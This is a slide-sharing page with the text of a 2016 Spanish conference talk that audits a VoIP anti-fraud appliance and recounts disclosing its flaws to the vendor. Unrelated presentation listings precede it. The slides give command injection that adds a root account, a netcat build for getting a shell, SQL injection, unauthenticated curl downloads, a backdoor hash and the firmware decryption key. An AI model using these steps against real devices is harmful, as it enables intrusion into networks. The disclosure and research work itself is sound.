Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxAlexander López
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 

Último (20)

Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 

José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los productos de seguridad

  • 1. @pepeluxx ANALIZANDO LA SEGURIDAD DE UN DISPOSITIVO DE SEGURIDAD
  • 2. @pepeluxx Jose Luis Verdeguer Sobre mi • Ingeniero Técnico de Sistemas Informáticos por la UA • Master en Desarrollo y Programación de Apps y Servicios Web • CTO en Zoonsuite (operador de VoIP) • Ponente en diferentes congresos nacionales • Autor del libro Hacking y Seguridad VoIP (de 0xWORD) eMail: verdeguer@zoonsuite.com Linkedin: https://www.linkedin.com/in/pepelux Twitter: @pepeluxx
  • 3. @pepeluxx ¿Es lo mismo si nos atacan un sistema de VoIP que si nos atacan una web, un servidor de correo, o cualquier otro servicio? ¿ Son las mismas consecuencias ? Problemas de la VoIP
  • 4. @pepeluxx Alguien que ataca una web lo suele hacer por: • Simple diversión • Motivos políticos • Elevar su ego • Robo de información Problemas de la VoIP
  • 5. @pepeluxx Alguien que ataca un sistema de VoIP lo hace por: • Motivos económicos • $$$$$ • = grandes pérdidas
 en poco tiempo Problemas de la VoIP
  • 10. @pepeluxx • Una buena administración, ¿es suficiente? • Cada día aparecen nuevas técnicas de ataque, nuevos fallos, … • Posiblemente tenemos que proteger diferentes servicios • PBX, Proxy, Web, TFTP, BBDD, Radius, Billing, etc • Una buena solución es un firewall: • Que nos ofrezca seguridad en la red • Que además ‘sepa’ de VoIP • Se debe tener siempre los sistemas actualizados • Pero, no es tan sencillo Soluciones
  • 11. @pepeluxx • Análisis de un dispositivo para evitar el fraude en VoIP • Funcionalidad • Seguridad del propio aparato • Respuesta por parte del fabricante Agenda
  • 12. @pepeluxx •Análisis de paquetes SIP basándose en reglas de Snort. •Anomalías en el protocolo SIP. •Ataques de fingerprinting, enumeración de usuarios y crackeo de contraseñas. •Protección ante diferentes tipos de ataques: •Dos/DDos. •CSS. •Buffer overflow. •Vulnerabilidades conocidas. •Detección de fraude. •SPIT o spam telefónico y war dialing. •Posee listas negras dinámicas, listas blancas y reglas de firewall. •Geolocalización. Características
  • 18. @pepeluxx ¿Cómo analizamos la seguridad de un dispositivo físico? • Teniendo acceso al Firmware • Si podemos descomprimirlo … • … tendremos acceso a todo el sistema • Problemas: • Pocos fabricantes ponen el firmware en la web • Suele venir cifrado Análisis del dispositivo
  • 19. @pepeluxx ¿Cómo analizamos la seguridad de un dispositivo físico? • Accediendo a los paneles de administración • Web • SSH • Telnet • Problemas: • Análisis a ciegas Análisis del dispositivo
  • 20. @pepeluxx ¿Cómo analizamos la seguridad de un dispositivo físico? • Mediante puertos habilitados para la administración • Puertos de consola (si hay) • UART, JTAG, etc • Problemas: • Si no hay puerto de consola … • … tenemos que abrirlo = pérdida de garantía • Es posible que tengamos que soldar Análisis del dispositivo
  • 21. @pepeluxx • No tenemos acceso al firmware completo. • Podemos descargar actualizaciones desde la web del fabricante. • Vienen cifradas y no podemos meterle mano. Firmware
  • 22. @pepeluxx Para testearlo usaremos: • Un switch para crear una red local • Un Asterisk en una Raspberry PI • El dispositivo de seguridad :) • Un portátil desde donde lanzaremos los ataques Herramientas
  • 28. @pepeluxx • Programa de comandos • Exit Funcionalidad (Acceso SSH)
  • 29. @pepeluxx • svmap.py: localizar dispositivos y fingerprinting • svwar.py: enumerar extensiones • svcrack.py: crackear contraseñas por fuerza bruta • svcrash.py: bloquear ataques de SIPVicious • svreport.py: elaborar informes Funcionalidad (SIPVicious)
  • 34. @pepeluxx •Análisis de paquetes SIP basándose en reglas de Snort. •Anomalías en el protocolo SIP. •Ataques de fingerprinting, enumeración de usuarios y crackeo de contraseñas. •Protección ante diferentes tipos de ataques: •Dos/DDos. •CSS. •Buffer overflow. •Vulnerabilidades conocidas. •Detección de fraude. •SPIT o spam telefónico y war dialing. •Posee listas negras dinámicas, listas blancas y reglas de firewall. •Geolocalización. ??? Características
  • 36. @pepeluxx ¿Ejecutará la aplicación comandos propios o del sistema? Análisis: SSH
  • 39. @pepeluxx ¿Estarán bien filtradas las llamadas al sistema? Análisis: Panel Web
  • 41. @pepeluxx Repetimos el mismo proceso para sacar un listado de ficheros: • ls / -R > /tmp/salida • Ruta web: /home/stm/www/htdocs/shield/ • Redirigimos la salida a una ruta accesible vía web • Leemos de forma más fácil con un GET Análisis: Panel Web
  • 43. @pepeluxx Cabe la posibilidad de que el SSH no esté activo O que no sepamos la contraseña de acceso $ ./stm.sh "echo 'pepelux:x:0:0:root:/root:/bin/sh'>>/etc/passwd" 0 $ ./stm.sh "echo 'pepelux:$1$iZkveuzd$KV.232Z0uQ1TqNQxGiMne.: 10933:0:99999:7:::'>>/etc/shadow" 0 (pass 123456) Análisis: Panel Web
  • 44. @pepeluxx Si no tenemos acceso por SSH Podemos compilar netcat para MIPS (en este caso Little Endian) • Toolchains para MIPS LE: http://download1.dd-wrt.com/dd-wrtv2/downloads/toolchains/toolchains.tar.xz • Versión simplificada de Netcat: http://download.savannah.gnu.org/releases/netkitty/nk-1.9.tar.gz • Compilando la aplicación: $ mipsel-linux-uclibc-gcc -static -o nk-mips nk.c Análisis: Panel Web
  • 45. @pepeluxx Si no tenemos acceso por SSH Análisis: Panel Web
  • 46. @pepeluxx SQL Injection al autenticar el usuario SQL Injection en UNAME Análisis: Panel Web
  • 47. @pepeluxx Análisis del fichero de autenticación • View/login.php • include(“../Control/web_users.php”); Una BBDD en SQLite accesible desde la URL … tendrá un .htaccess, ¿no? • Control/web_users.php • include(“../Model/db_mgr.php”); • Model/db_mgr.php • private static $DB_FILE_ACTIVE = "../DB/stm.db"; Análisis: Panel Web
  • 49. @pepeluxx Análisis del código PHP Compara el password en MD5 de la BBDD con el password MD5 ya generado ¿WTF? Análisis: Panel Web
  • 51. @pepeluxx Si nos encontramos con un aparato de estos • Descargamos la BBDD con un GET • Accedemos al panel con el MD5 • Ya tenemos inyección de comandos • Nos creamos nuestro propio usuario • Eliminamos el .profile • Accedemos por SSH • Tenemos una bonita shell como root Recapitulando …
  • 54. @pepeluxx Espera entrada de datos ¿ Primer valor == set ? Imprime datos de br0: • IP • Netmask • MAC address Setea interfaz br0: • IP • Netmask • MAC address Espera: IP|Netmask|MAC No Sí Análisis: Otros servicios
  • 55. @pepeluxx •Análisis de paquetes SIP basándose en reglas de Snort. •Anomalías en el protocolo SIP. •Ataques de fingerprinting, enumeración de usuarios y crackeo de contraseñas. •Protección ante diferentes tipos de ataques: •Dos/DDos. •CSS. •Buffer overflow. •Vulnerabilidades conocidas. •Detección de fraude. •SPIT o spam telefónico y war dialing. •Posee listas negras dinámicas, listas blancas y reglas de firewall. •Geolocalización. ??? Características
  • 56. @pepeluxx Analizar el maincli ¿ Qué más podemos hacer ?
  • 57. @pepeluxx mmm … ¿una backdoor sólo conocida por el fabricante? ¿ Qué más podemos hacer ?
  • 58. @pepeluxx mmm … ¿una backdoor sólo conocida por el fabricante? ¿ Qué más podemos hacer ?
  • 59. @pepeluxx mmm … ¿una backdoor sólo conocida por el fabricante? sha1 (sin salt): 81f7d39814fd68035fd07f1c74999bbd34af0237 ¿ Qué más podemos hacer ?
  • 60. @pepeluxx mmm … ¿una backdoor sólo conocida por el fabricante? ¿ Qué más podemos hacer ?
  • 61. @pepeluxx Ver cómo descifra el firmware $ openssl enc -aes-256-cbc -d -salt -S 3259545633584c4e32594c524c4456394d434b43000a -K 325959465859484232594656564d573833584c4a4742485632434b55000a -iv 3176302e000 -in stm_update.bin -out stm_update2.bin ¿ Qué más podemos hacer ?
  • 63. @pepeluxx Mediados de Julio: • Envío todos los fallos descubiertos. • Le sugiero que contrate una auditoría urgentemente con una empresa especializada. Respuesta rápida por parte del fabricante: • Muchas gracias por el aviso. • Nos vamos a centrar en solucionarlo. Aviso al fabricante
  • 64. @pepeluxx Finales de Agosto (mail del fabricante): • Lo hemos solucionado todo. • Te vamos a mandar un dispositivo nuevo con la versión 2.0. • Esperamos el feedback por tu parte. ¿ Realmente no se pueden permitir pagar una auditoría ? Aviso al fabricante
  • 65. @pepeluxx Finales de Septiembre: • Me llega el dispositivo desde La India. Principales cambios: • Nueva caja más compacta. • Cambio de MIPS a ARM. • Distribución Debian con ¿¿ SID ?? Aviso al fabricante
  • 66. @pepeluxx Tras recibir el aparato nuevo: • Lo conecto a la red, accedo a la web. • Y 10 min más tarde le envío esto al fabricante: Le vuelvo a sugerir que contrate una auditoría. • No están por la labor. • Lo único que quieren es que les diga cómo entré. Aviso al fabricante
  • 67. @pepeluxx Mismo sitio, diferente parámetro Problemas
  • 68. @pepeluxx En este caso conozco la contraseña del panel Los fallos que les comenté están solucionados: •Ya no puedo descargar la BBDD con un GET •Ya no puedo inyectar en el login Podemos descargar un backup de la BBDD cifrada: •curl --insecure https://192.168.1.222/View/download.php?id=db Pero el fichero PHP del panel que descarga la configuración del usuario (la BBDD cifrada) no comprueba la variable de sesión Problemas
  • 70. @pepeluxx Más ficheros que no verifican la variable de sesión El panel sólo permite un usuario activo. Si se autentica correctamente un segundo usuario, echa al primero. Podemos echar al usuario activo sin autenticarnos: •curl --insecure -d “config=Continue” https://192.168.1.222/View/login_multi_attempt.php •También hay otras partes del panel que no verifican la sesión: Podemos descargar toda la configuración del sistema: •curl --insecure https://192.168.1.222/View/download.php?id=diagnostics O descargar las alertas detectadas por el dispositivo: •curl --insecure https://192.168.1.222/View/download.php?id=alert Problemas
  • 71. @pepeluxx ¿ Cuál es el problema ? En materia de seguridad hay: •Falta de conocimientos. •Falta de concienciación. •Falta de interés. Problemas
  • 72. @pepeluxx ¿ Qué ocurre si inyectamos código en el hostname ? •El dispositivo entra en un bucle de reinicios. •¡¡ Tuve que reflashearlo !! Problemas
  • 73. @pepeluxx Y lo peor de todo … •Han desarrollado una nueva versión 2.0 •Está basada en arquitectura ARM. Pero, ¿ qué hay de los clientes que tiene la versión 1.0 basada en arquitectura MIPS ? ¿va a haber nuevo firmware o hay que comprar un nuevo dispositivo? Problemas
  • 74. @pepeluxx Muchas veces surgen buenas ideas con buenas intenciones •Es importante analizar no sólo la funcionalidad y la usabilidad. •Sino también la seguridad del propio dispositivo. En este caso, un dispositivo que debe bloquear ataques hacia nuestra PBX •Permite que se nos cuelen en nuestra red: •Acceso a todo el sistema. •Ya no hay firewall de por medio. •Monitorización de tráfico. Conclusiones
  • 75. @pepeluxx GRACIAS a tod@s GRACIAS a todos Espero que os haya gustado :)